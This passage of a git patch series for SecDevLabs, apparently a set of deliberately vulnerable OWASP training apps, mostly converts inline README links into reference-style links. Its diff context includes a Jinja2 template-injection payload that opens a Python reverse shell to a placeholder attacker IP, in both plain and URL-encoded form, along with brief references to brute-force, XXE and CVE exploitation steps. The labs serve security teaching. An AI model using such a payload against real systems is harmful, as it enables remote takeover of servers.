file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: ```js const existUser = await User.findOne({ email: email }); @@ -120,6 +120,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[db.js]: https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js \ No newline at end of file From 3f8ddfc4f8aa2cc3432e6c316c01c246c2dce64c Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:21:12 -0300 Subject: [PATCH 21/31] Update README.md --- owasp-top10-2021-apps/a3/sstype/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/sstype/README.md b/owasp-top10-2021-apps/a3/sstype/README.md index db055c58a..ca702d007 100644 --- a/owasp-top10-2021-apps/a3/sstype/README.md +++ b/owasp-top10-2021-apps/a3/sstype/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **Server-Side Template Injection ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/sstype @@ -127,7 +127,7 @@ Don't forget to replace `ATTACKER-IP` and `ATTACKER-PORT` below! {%import os%}{{os.popen("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER-IP\",ATTACKER-PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read()}} ``` -However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder](https://www.urlencoder.org/) may help) and hope for a shell: +However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder][online URL encoder] may help) and hope for a shell: ```python %7B%25import%20os%25%7D%7B%7Bos.popen%28%22python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ATTACKER-IP%5C%22%2CATTACKER-PORT%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fbash%5C%22%2C%5C%22-i%5C%22%5D%29%3B%27%22%29.read%28%29%7D%7D @@ -147,6 +147,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[online URL encoder]: https://www.urlencoder.org/ From 477accf8105582768d8c1140a8ba982b24ac1164 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:22:29 -0300 Subject: [PATCH 22/31] Update README.md --- owasp-top10-2021-apps/a3/streaming/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a3/streaming/README.md b/owasp-top10-2021-apps/a3/streaming/README.md index a321c47e3..087d26da5 100644 --- a/owasp-top10-2021-apps/a3/streaming/README.md +++ b/owasp-top10-2021-apps/a3/streaming/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/streaming @@ -106,4 +106,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10007 From be0cfa5e152336eec137f1dcfba85c2cef05b040 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:24:27 -0300 Subject: [PATCH 23/31] Update README.md --- owasp-top10-2021-apps/a5/misconfig-wordpress/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md index ace652ed1..c84b9eeb4 100644 --- a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md +++ b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress @@ -69,7 +69,7 @@ An attacker could try to log in with the username: `admin` and realize, through ### 🔥 -At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below: +At this moment, an attacker could use [Burp Suite][Burp Suite] to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to Intruder, as shown below:

@@ -222,9 +222,12 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:8000 [wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt [wpscan]: https://wpscan.org/ [malicious code]: https://www.exploit-db.com/exploits/44949 [nikto]: https://cirt.net/Nikto2 [searchsploit]: https://www.exploit-db.com/searchsploit +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp From 3bcc92454a29ea049306e53c0821cbcb4d393707 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:25:11 -0300 Subject: [PATCH 24/31] Update README.md --- owasp-top10-2021-apps/a5/stegonography/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a5/stegonography/README.md b/owasp-top10-2021-apps/a5/stegonography/README.md index 44e5dd3ae..fdb17dbfc 100644 --- a/owasp-top10-2021-apps/a5/stegonography/README.md +++ b/owasp-top10-2021-apps/a5/stegonography/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/stegonography @@ -135,7 +135,9 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 [dirb]: https://tools.kali.org/web-applications/dirb From cbee704162bc0a25d4f186843ed39c2afdcca4ba Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:28:14 -0300 Subject: [PATCH 25/31] Update README.md --- owasp-top10-2021-apps/a5/vinijr-blog/README.md | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/owasp-top10-2021-apps/a5/vinijr-blog/README.md b/owasp-top10-2021-apps/a5/vinijr-blog/README.md index 7dde735a1..3bd7291c8 100644 --- a/owasp-top10-2021-apps/a5/vinijr-blog/README.md +++ b/owasp-top10-2021-apps/a5/vinijr-blog/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **XXE** vulnerabilities can be explo ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/vinijr-blog @@ -54,11 +54,11 @@ After reviewing the inputs from the app, it is possible to identify that the sec -Using [Burp Suite](https://portswigger.net/burp) proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)): +Using [Burp Suite][Burp Suite] proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide][guide]: -To replicate this POST using [curl](https://curl.haxx.se/), create the following file `payload.xml`: +To replicate this POST using [curl][curl], create the following file `payload.xml`: ```XML @@ -82,7 +82,7 @@ By checking the source code of the [file](../vinijr-blog/app/contact.php), it is ### 🔥 -As no validation is being used to avoid [ENTITIES](https://www.w3schools.com/xml/xml_dtd_entities.asp) being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: +As no validation is being used to avoid [ENTITIES][ENTITIES] being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: ```XML @@ -121,4 +121,9 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10004 +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +[curl]: https://curl.haxx.se/ +[ENTITIES]: https://www.w3schools.com/xml/xml_dtd_entities.asp \ No newline at end of file From 6e3db3359c90d4be50ff50d4c86b83b629a77c38 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:33:36 -0300 Subject: [PATCH 26/31] Update README.md --- owasp-top10-2021-apps/a6/cimentech/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a6/cimentech/README.md b/owasp-top10-2021-apps/a6/cimentech/README.md index a888c91c9..d19b63045 100644 --- a/owasp-top10-2021-apps/a6/cimentech/README.md +++ b/owasp-top10-2021-apps/a6/cimentech/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Vulnerable and Outdated Components ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a6/cimentech @@ -65,7 +65,7 @@ Having the CMS version, it's possible to check on [exploit-db][3] if there are a -By using [searchsploit](https://www.exploit-db.com/searchsploit), an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : +By using [searchsploit][searchsploit], an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : ```sh ⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts' @@ -125,6 +125,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs +[searchsploit]: https://www.exploit-db.com/searchsploit [app]: http://localhost:80 [secdevlabs]: https://github.com/globocom/secDevLabs [1]: https://www.ruby-lang.org/en/documentation/installation/ From 01d3b602b355f0d6eb73a31d64c11fc0b0db6bf7 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:35:38 -0300 Subject: [PATCH 27/31] Update README.md --- owasp-top10-2021-apps/a6/golden-hat/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a6/golden-hat/README.md b/owasp-top10-2021-apps/a6/golden-hat/README.md index 4b66e20c9..8ad8ef917 100644 --- a/owasp-top10-2021-apps/a6/golden-hat/README.md +++ b/owasp-top10-2021-apps/a6/golden-hat/README.md @@ -67,7 +67,7 @@ Once we try reaching the `/golden.secret` we can see interesting headers: As we can see this `Via: mitmproxy/5.3.0` helps us with the recon. Now that we know what is running on the server we can search for CVEs on this version of mitmproxy. Once we found the CVE-2021-39214, we can make an exploit to this vulnerability. -Let's take a look on the mitmproxy source code, [TAG 5.3.0](https://github.com/mitmproxy/mitmproxy/tree/v5.3.0) at file [/mitmproxy/net/http/http1/read.py:L209](https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209): +Let's take a look on the mitmproxy source code, [TAG 5.3.0][TAG 5.3.0] at file [/mitmproxy/net/http/http1/read.py:L209][/mitmproxy/net/http/http1/read.py:L209]: ```python if "chunked" in headers.get("transfer-encoding", "").lower(): @@ -122,3 +122,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 +[TAG 5.3.0]: https://github.com/mitmproxy/mitmproxy/tree/v5.3.0 +[/mitmproxy/net/http/http1/read.py:L209]: https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209 From 49b77a05cb136aea6b7b98015b33edc6181bb913 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:36:19 -0300 Subject: [PATCH 28/31] Update README.md --- owasp-top10-2021-apps/a7/insecure-go-project/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a7/insecure-go-project/README.md b/owasp-top10-2021-apps/a7/insecure-go-project/README.md index 49c200e69..dca300447 100644 --- a/owasp-top10-2021-apps/a7/insecure-go-project/README.md +++ b/owasp-top10-2021-apps/a7/insecure-go-project/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/insecure-go-project @@ -79,5 +79,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb From ef1b427b6d3838d1244ee9da7edeabe8aa22f450 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:37:00 -0300 Subject: [PATCH 29/31] Update README.md --- owasp-top10-2021-apps/a7/saidajaula-monster/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md index 4240f4b48..ac8d379d1 100644 --- a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md +++ b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/saidajaula-monster @@ -140,5 +140,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb From 07a72d1584f287b307144f38874f28271238e22a Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:37:50 -0300 Subject: [PATCH 30/31] Update README.md --- owasp-top10-2021-apps/a8/amarelo-designs/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/README.md b/owasp-top10-2021-apps/a8/amarelo-designs/README.md index cbacc5052..f4fa20615 100644 --- a/owasp-top10-2021-apps/a8/amarelo-designs/README.md +++ b/owasp-top10-2021-apps/a8/amarelo-designs/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Software and Data Integrity Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a8/amarelo-designs @@ -163,6 +163,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10008 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a8/amarelo-designs From ecdfb3fe9f51747fa492fbfab9f313f544c63b67 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:39:30 -0300 Subject: [PATCH 31/31] Update README.md --- owasp-top10-2021-apps/a9/games-irados/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a9/games-irados/README.md b/owasp-top10-2021-apps/a9/games-irados/README.md index dbef5d09a..e049cdfd9 100644 --- a/owasp-top10-2021-apps/a9/games-irados/README.md +++ b/owasp-top10-2021-apps/a9/games-irados/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Logging and Monitoring Fa ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a9/games-irados @@ -64,7 +64,7 @@ Initially, we begin the first attack by sending an intentionally wrong login att ## 🔥 -After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below: +After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below:

@@ -170,7 +170,10 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10010 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados [burp suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +